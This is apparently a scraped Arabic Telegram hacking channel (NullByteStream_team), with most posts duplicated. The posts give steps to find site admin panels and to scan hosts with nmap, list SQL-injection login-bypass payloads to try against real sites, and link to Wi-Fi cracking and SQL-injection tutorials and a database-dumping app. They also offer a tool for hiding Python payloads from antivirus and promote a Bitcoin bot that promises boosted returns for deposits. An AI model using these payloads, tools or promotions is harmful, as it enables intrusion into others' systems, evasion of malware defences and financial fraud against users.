سطر اوامر لينكس.pdf
3.2 MB
كتاب مفيد للمبتدئين في نظام لينوكس .. تعلم التعامل مع موجه الأوامر terminal .. فيه شرح لأهم الأوامر
طريقة إيجاد لوحة تحكم موقع
عن طريق أداة admin panel finder على التيرمكس أو الكالي لينوكس ( تعمل على معظم الأنظمة )
تحميل الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
cd admin-panel-finder
python2 admin-panel-finder.py
ثم أدخل اسم الموقع واضغط Enter لتقوم الأداة بتجربة العديد من الروابط وإيجاد رابط لوحة التحكم
#NullByteStream_team
عن طريق أداة admin panel finder على التيرمكس أو الكالي لينوكس ( تعمل على معظم الأنظمة )
تحميل الأداة
git clone https://github.com/bdblackhat/admin-panel-finder
cd admin-panel-finder
python2 admin-panel-finder.py
ثم أدخل اسم الموقع واضغط Enter لتقوم الأداة بتجربة العديد من الروابط وإيجاد رابط لوحة التحكم
#NullByteStream_team
أداة nmap تعد من أقوى الأدوات لفحص المواقع .. فهي تكشف المنافذ المفتوحة في الموقع والخدمات المستخدمة والكثير من الميزات الأخرى .. كما يمكن عن طريقها فحص عناوين الآي بي ضمن مجال محدد ( لتحديد العناوين الموجودة على الشبكة - يفيد في تحديد الأجهزة المتصلة معك على نفس الشبكة مثلاً مع نوع الجهاز كما تحاول تحديد نظام التشغيل ..... )
أولاً تثبيت الأداة (الأداة مثبتة مسبقاً على نظام الكالي لينوكس ) :
apt-get install nmap
أو
pkg install nmap
انتظر حتى اكتمال التثبيت
الآن لنجرب الأوامر الأساسية
nmap site.com
ضع مكان site.com اسم موقع أو عنوان آي بي لتقوم الأداة بفحصه وكشف المنافذ المفتوحة و ...
nmap 192.168.1.*
لفحص الأجهزة المتصلة معك على نفس الشبكة ( قم بتغيير الآي بي إلى عنوان شبكتك ) حيث ستقوم الأداة بفحص عناوين الآي بي بالترتيب
192.168.1.0
192.168.1.1
192.168.1.2 .....
قد تلاحظ أن الأداة تفحص المنافذ ضمن المجال من 1 إلى 1000 فقط .. إذا أردت أن تقوم الأداة بفحص جميع المنافذ ( من 1 إلى 65535 ) ضع -p-
nmap -p- 192.168.1.1
لمحاولة كشف نظام التشغيل .. نضيف -O
nmap -O 192.168.1.1
لإجراء فحص شامل لنظام التشغيل وكشف الإصدار والسكريبت و ... نضيف -A
nmap -A 192.168.1.1
بالطبع قد تستغرق الأداة وقتاً طويلاً عند إجراء فحص كبير مثل فحص جميع المنافذ
ميزات وإمكانيات الأداة أكبر من ذلك بكثير .. ولكن ذكرت المبادئ الأساسية
#NullByteStream_team
أولاً تثبيت الأداة (الأداة مثبتة مسبقاً على نظام الكالي لينوكس ) :
apt-get install nmap
أو
pkg install nmap
انتظر حتى اكتمال التثبيت
الآن لنجرب الأوامر الأساسية
nmap site.com
ضع مكان site.com اسم موقع أو عنوان آي بي لتقوم الأداة بفحصه وكشف المنافذ المفتوحة و ...
nmap 192.168.1.*
لفحص الأجهزة المتصلة معك على نفس الشبكة ( قم بتغيير الآي بي إلى عنوان شبكتك ) حيث ستقوم الأداة بفحص عناوين الآي بي بالترتيب
192.168.1.0
192.168.1.1
192.168.1.2 .....
قد تلاحظ أن الأداة تفحص المنافذ ضمن المجال من 1 إلى 1000 فقط .. إذا أردت أن تقوم الأداة بفحص جميع المنافذ ( من 1 إلى 65535 ) ضع -p-
nmap -p- 192.168.1.1
لمحاولة كشف نظام التشغيل .. نضيف -O
nmap -O 192.168.1.1
لإجراء فحص شامل لنظام التشغيل وكشف الإصدار والسكريبت و ... نضيف -A
nmap -A 192.168.1.1
بالطبع قد تستغرق الأداة وقتاً طويلاً عند إجراء فحص كبير مثل فحص جميع المنافذ
ميزات وإمكانيات الأداة أكبر من ذلك بكثير .. ولكن ذكرت المبادئ الأساسية
#NullByteStream_team
بعض أكواد الاستغلال لثغرة Admin Bypass لتخطي كلمة سر لوحة التحكم المصابة
'or'
"or"
'=' 'or'
"=" "or"
'or''='
"or""="
')or(''='
")or(""="
A' or '1'='1
......
أكواد من تصميمي - قد تعمل إذا لم تنجح الأكواد السابقة
'or'1'='1'or'
"or"1"="1"or"
جرب كل الاحتمالات قد ينجح أحدها
#NullByteStream_team
'or'
"or"
'=' 'or'
"=" "or"
'or''='
"or""="
')or(''='
")or(""="
A' or '1'='1
......
أكواد من تصميمي - قد تعمل إذا لم تنجح الأكواد السابقة
'or'1'='1'or'
"or"1"="1"or"
جرب كل الاحتمالات قد ينجح أحدها
#NullByteStream_team
البوت الأول
تم السحب بنجاح 👍
والبوت صادق 100% صورة إثبات السحب في الأسفل
رابط البوت
http://t.me/BitcoinAntPoolbot?start=774282935
طريقة العمل وسحب الربح :
كل ما عليك فعله هو الدخول إلى البوت وضغط Bonus كل 24 ساعة لتحصل على ما يقارب 1000 إلى 3000 ساتوشي satoshi .. الساتوشي هو نوع من العملات حيث كل 50000 ساتوشي تساوي 0.0005 بيتكوين
وكل 1 بيتكوين يساوي تقريباً 4000 دولار ! وهو يزداد كل يوم
إذاً كل ما عليك فعله هو جمع الرصيد كل يوم وعند الوصول إلى الحد الأدنى للسحب ( وهو 50000 ساتوشي ) يمكنك تحويل الرصيد
لتحويل الرصيد تحتاج إلى محفظة wallet لتحويل الرصيد إليها والقيام بعمليات الدفع منها .. أشهر محفظة هي موقع blockchain ولكن الأسهل هو تطبيق bitpie للأندرويد .. قم بتحميله من أي متجر
بعد التحميل والدخول سيعطيك قائمة من 9 كلمات و9 فراغات .. اكتب الكلمات في هذه الفراغات ( هذه الكلمات هي بمثابة كلمة سر للدخول لحسابك .. اكتبها على ورقة واحتفظ بها فبدونها لن تتمكن من الدخول لحسابك لاحقاً ) ثم بعدها سيطلب تحديد رمز للدخول للتطبيق ..
لتحويل الرصيد إليها تحتاج إلى عنوان المحفظة .. يمكنك الحصول عليه بضغط receive وسيظهر العنوان بهذا الشكل
gFXGfXrodaXksXjpdXdlvn
تقريباً .. اضغط عليه للنسخ وأرسله للبوت ليقوم بتحويل الرصيد إليه
يمكنك لاحقاً القيام بdesposit أي تحويل رصيد للبوت لتسريع جمع الرصيد .. فعند تحويل 0.001 بيتكوين إلى البوت سيزداد الرصيد اليومي الذي تحصل عليه بمقدار 10%
#NullByteStream_team
تم السحب بنجاح 👍
والبوت صادق 100% صورة إثبات السحب في الأسفل
رابط البوت
http://t.me/BitcoinAntPoolbot?start=774282935
طريقة العمل وسحب الربح :
كل ما عليك فعله هو الدخول إلى البوت وضغط Bonus كل 24 ساعة لتحصل على ما يقارب 1000 إلى 3000 ساتوشي satoshi .. الساتوشي هو نوع من العملات حيث كل 50000 ساتوشي تساوي 0.0005 بيتكوين
وكل 1 بيتكوين يساوي تقريباً 4000 دولار ! وهو يزداد كل يوم
إذاً كل ما عليك فعله هو جمع الرصيد كل يوم وعند الوصول إلى الحد الأدنى للسحب ( وهو 50000 ساتوشي ) يمكنك تحويل الرصيد
لتحويل الرصيد تحتاج إلى محفظة wallet لتحويل الرصيد إليها والقيام بعمليات الدفع منها .. أشهر محفظة هي موقع blockchain ولكن الأسهل هو تطبيق bitpie للأندرويد .. قم بتحميله من أي متجر
بعد التحميل والدخول سيعطيك قائمة من 9 كلمات و9 فراغات .. اكتب الكلمات في هذه الفراغات ( هذه الكلمات هي بمثابة كلمة سر للدخول لحسابك .. اكتبها على ورقة واحتفظ بها فبدونها لن تتمكن من الدخول لحسابك لاحقاً ) ثم بعدها سيطلب تحديد رمز للدخول للتطبيق ..
لتحويل الرصيد إليها تحتاج إلى عنوان المحفظة .. يمكنك الحصول عليه بضغط receive وسيظهر العنوان بهذا الشكل
gFXGfXrodaXksXjpdXdlvn
تقريباً .. اضغط عليه للنسخ وأرسله للبوت ليقوم بتحويل الرصيد إليه
يمكنك لاحقاً القيام بdesposit أي تحويل رصيد للبوت لتسريع جمع الرصيد .. فعند تحويل 0.001 بيتكوين إلى البوت سيزداد الرصيد اليومي الذي تحصل عليه بمقدار 10%
#NullByteStream_team
صورة إثبات السحب 👆
رابط الإثبات على blockchain
https://www.blockchain.com/btc/tx/50a71274079feae39e66febad054ddc738fe2ee42d897906468399ed4d4e3131
رابط الإثبات على blockchain
https://www.blockchain.com/btc/tx/50a71274079feae39e66febad054ddc738fe2ee42d897906468399ed4d4e3131
Forwarded from Project Sigma
تم إنشاء موقع للفريق وسنتابع شرح الدروس عليه لسهولة وضع الصور والأكواد ضمن الشرح ولأن بعض الدروس طويلة جداً ومن الصعب نشرها على القناة مباشرةً
بالطبع سأضع رابط كل درس على القناة 👍🏻
رابط الموقع
http://nullbytestream.tk
بالطبع سأضع رابط كل درس على القناة 👍🏻
رابط الموقع
http://nullbytestream.tk
سنعيد نشر الدروس السابقة على الموقع .. وقد أضيف بعض الصور الإضافية للتوضيح
#تعلم_الاختراق
#الدرس_الأول
الرابط
http://adfoc.us/47885071290428
#اختراق_الأجهزة
#الدرس_الأول
الرابط
http://adfoc.us/47885071290652
بعد الدخول إلى الرابط انتظر 5 ثواني ثم اضغط على زر
skip
أعلى ويمين الصفحة
#تعلم_الاختراق
#الدرس_الأول
الرابط
http://adfoc.us/47885071290428
#اختراق_الأجهزة
#الدرس_الأول
الرابط
http://adfoc.us/47885071290652
بعد الدخول إلى الرابط انتظر 5 ثواني ثم اضغط على زر
skip
أعلى ويمين الصفحة
Forwarded from Project Sigma - Advanced PT
#اختراق_شبكات_الوايفاي
#الدرس_الثاني
الطريقة الاحترافية لاختراق أي شبكة واي فاي .. باستخدام أداة aircrack-ng
الشرح على نظام الكالي لينوكس .. يعمل على أي نظام لينوكس وقد يعمل على التيرمكس حسب الجهاز
رابط الشرح
https://dwindly.io/nLKxmX
بعد الدخول إلى الرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
#الدرس_الثاني
الطريقة الاحترافية لاختراق أي شبكة واي فاي .. باستخدام أداة aircrack-ng
الشرح على نظام الكالي لينوكس .. يعمل على أي نظام لينوكس وقد يعمل على التيرمكس حسب الجهاز
رابط الشرح
https://dwindly.io/nLKxmX
بعد الدخول إلى الرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
طريقة التحقق مما إذا كان كرت الوايرلس لجهازك يدعم الmonitoring ( لاختراق شبكات الواي فاي - الدرس السابق )
بالأمر التالي :
هذا الأمر يسرد قائمة بالأوامر والأوضاع المتوفرة لكرت الوايرلس
بعد كتابة الأمر ستظهر قائمة طويلة .. إذا وجدت كلمة monitor فالجهاز يدعمها
كما في الصورة في الأسفل 👇🏻
#NullByteStream_team
بالأمر التالي :
iw listهذا الأمر يسرد قائمة بالأوامر والأوضاع المتوفرة لكرت الوايرلس
بعد كتابة الأمر ستظهر قائمة طويلة .. إذا وجدت كلمة monitor فالجهاز يدعمها
كما في الصورة في الأسفل 👇🏻
#NullByteStream_team
#تعلم_الاختراق
#الدرس_السادس
ثغرة Sql Injection
مقدمة في ثغرة حقن قواعد البيانات
هذا الموضوع ضخم جداً .. ولشرحه بشكل جيد وكامل قمت بتقسيمه إلى عدة أجزاء
#القسم_الأول
رابط الشرح
http://dwindly.io/nRb1JE
بعد الدخول للرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
#الدرس_السادس
ثغرة Sql Injection
مقدمة في ثغرة حقن قواعد البيانات
هذا الموضوع ضخم جداً .. ولشرحه بشكل جيد وكامل قمت بتقسيمه إلى عدة أجزاء
#القسم_الأول
رابط الشرح
http://dwindly.io/nRb1JE
بعد الدخول للرابط اضغط continue وانتظر 5 ثواني ثم اضغط get link
#NullByteStream_team
رابط تحميل تطبيق DroidSqli للأندرويد لاستغلال ثغرة Sql Injection
تطبيق حقن قواعد البيانات للأندرويد
كل ما عليك فعله هو وضع رابط الموقع المصاب وضغط inject وسيقوم بكل العمل ويجلب لك قاعدة البيانات جاهزة
رابط التحميل
https://dwindly.io/nRpzpd
#NullByteStream_team
تطبيق حقن قواعد البيانات للأندرويد
كل ما عليك فعله هو وضع رابط الموقع المصاب وضغط inject وسيقوم بكل العمل ويجلب لك قاعدة البيانات جاهزة
رابط التحميل
https://dwindly.io/nRpzpd
#NullByteStream_team
تثبيت الميتاسبلويت على التيرمكس بسهولة وبدون أي مشاكل
اكتب الأوامر التالية بالترتيب :
ستقوم الأداة بتحميل وتثبيت كل متطلبات البرنامج تلقائياً
بعد الانتهاء اكتب الأمر
لتشغيل الأداة
#NullByteStream_team
اكتب الأوامر التالية بالترتيب :
wget https://Auxilus.github.io/metasploit.sh
bash metasploit.shستقوم الأداة بتحميل وتثبيت كل متطلبات البرنامج تلقائياً
بعد الانتهاء اكتب الأمر
msfconsoleلتشغيل الأداة
#NullByteStream_team
Forwarded from Project Sigma - Advanced PT
Quick Script Encryption Tool - V1.0
أداة تشفير سكريبتات البايثون ( من تصميمي ) لتشفير بايلودات البايثون وإخفائها عن برامج الحماية بشكل كامل
أو لحماية برنامجك من التعديل بسهولة
الأداة تدعم التشفير عدة مرات لنفس الملف لجعل فكه أصعب
أوامر التحميل
الأداة تحتاج مترجم البايثون الإصدار الثاني .. إذا واجهت مشكلة في تشغيلها اكتب الأمر
بعد تشغيلها أدخل مسار الملف ثم أدخل عدد مرات التشفير ( الافتراضي 5 ) بعد الانتهاء ستقوم الأداة بعرض مسار الملف المشفر
#NullByteStream_team
أداة تشفير سكريبتات البايثون ( من تصميمي ) لتشفير بايلودات البايثون وإخفائها عن برامج الحماية بشكل كامل
أو لحماية برنامجك من التعديل بسهولة
الأداة تدعم التشفير عدة مرات لنفس الملف لجعل فكه أصعب
أوامر التحميل
wget http://nullbytestream.tk/files/quick_encryption_tool.py
chmod 777 quick_encryption_tool.py
python2 quick_encryption_tool.py
الأداة تحتاج مترجم البايثون الإصدار الثاني .. إذا واجهت مشكلة في تشغيلها اكتب الأمر
apt-get install python2
بعد تشغيلها أدخل مسار الملف ثم أدخل عدد مرات التشفير ( الافتراضي 5 ) بعد الانتهاء ستقوم الأداة بعرض مسار الملف المشفر
#NullByteStream_team
رابط تحميل أداة Droid Sqli لمن واجه مشاكل في الدخول إلى الرابط السابق
http://www.mediafire.com/file/046x6da3pr69nbb/DriodSQLi-net.edgard.droidsqli-1-v1.0.apk
#NullByteStream_team
http://www.mediafire.com/file/046x6da3pr69nbb/DriodSQLi-net.edgard.droidsqli-1-v1.0.apk
#NullByteStream_team
#تعلم_الاختراق
#الدرس_السادس
ثغرة Sql Injection
لمن واجه مشاكل في الدخول إلى رابط الدرس .. هذا الرابط الجديد المباشر
http://nullbytestream.tk/articles.php?id=929963882081210624
#NullByteStream_team
#الدرس_السادس
ثغرة Sql Injection
لمن واجه مشاكل في الدخول إلى رابط الدرس .. هذا الرابط الجديد المباشر
http://nullbytestream.tk/articles.php?id=929963882081210624
#NullByteStream_team
ملاحظات عن نظام لينوكس
msfpc
أمر تشغيل برنامج msfpc
مثلاً
msfconsole
سيقوم بتشغيل أداة الميتاسبلويت
هذا الملف التنفيذي msfconsole موجود في مسار محدد
/usr/bin
أو
/usr/sbin
حسب نظام جهازك
ولكن الفكرة أنه عند إضافة أي برنامج إلى هذا المجلد يمكنك تشغيله من أي مكان بكتابة اسمه فقط
أما
./filename
فهم أمر تشغيل الملف filename الموجود في المسار "نفسه"
لأنك وضعت /. قبل الاسم
أي إذا أردنا فتح ملف موجود هنا
/sdcard/folder/prog.sh
نغير المسار أولاً إلى داخل المجلد
cd /sdcard/folder
ثم نفتح الملف
./prog.sh
فإذا كتبنا الأمر الأخير بدون تغيير المسار لن يتم تشغيل البرنامج وسيظهر خطأ أن الملف غير موجود
بينما إذا قمت بنسخه إلى مجلد
/usr/bin
فيمكنك تشغيله فوراً بكتابة اسمه
prog
بدون /.
بالطبع قد تحتاج لتحويله لصيغة تنفيذية أو إنشاء launcher لا يهم .. وضعت هذه الأمثلة للفهم فقط
#NullByteStream_team
msfpc
أمر تشغيل برنامج msfpc
مثلاً
msfconsole
سيقوم بتشغيل أداة الميتاسبلويت
هذا الملف التنفيذي msfconsole موجود في مسار محدد
/usr/bin
أو
/usr/sbin
حسب نظام جهازك
ولكن الفكرة أنه عند إضافة أي برنامج إلى هذا المجلد يمكنك تشغيله من أي مكان بكتابة اسمه فقط
أما
./filename
فهم أمر تشغيل الملف filename الموجود في المسار "نفسه"
لأنك وضعت /. قبل الاسم
أي إذا أردنا فتح ملف موجود هنا
/sdcard/folder/prog.sh
نغير المسار أولاً إلى داخل المجلد
cd /sdcard/folder
ثم نفتح الملف
./prog.sh
فإذا كتبنا الأمر الأخير بدون تغيير المسار لن يتم تشغيل البرنامج وسيظهر خطأ أن الملف غير موجود
بينما إذا قمت بنسخه إلى مجلد
/usr/bin
فيمكنك تشغيله فوراً بكتابة اسمه
prog
بدون /.
بالطبع قد تحتاج لتحويله لصيغة تنفيذية أو إنشاء launcher لا يهم .. وضعت هذه الأمثلة للفهم فقط
#NullByteStream_team
Forwarded from Project Sigma (ÃŕMąŃđÒ)
يسمح بنشر أي شرح من شروحاتي على أي قناة أخرى ولكن عن طريق إعادة التوجيه أو بذكر رابط القناة فقط
رابط القناة التي نقلت الشرح منها
#ArMaNdO
رابط القناة التي نقلت الشرح منها
#ArMaNdO
Forwarded from Project Sigma - Advanced PT (ÃŕMąŃđÒ)
Quick Script Encryption Tool - v1.0
تم إطلاق النسخة الخاصة بنظام الويندوز .. رابط التحميل
http://nullbytestream.tk/files/Quick_Script_Encryption_Tool_1.0.zip
#NullByteStream_team
تم إطلاق النسخة الخاصة بنظام الويندوز .. رابط التحميل
http://nullbytestream.tk/files/Quick_Script_Encryption_Tool_1.0.zip
#NullByteStream_team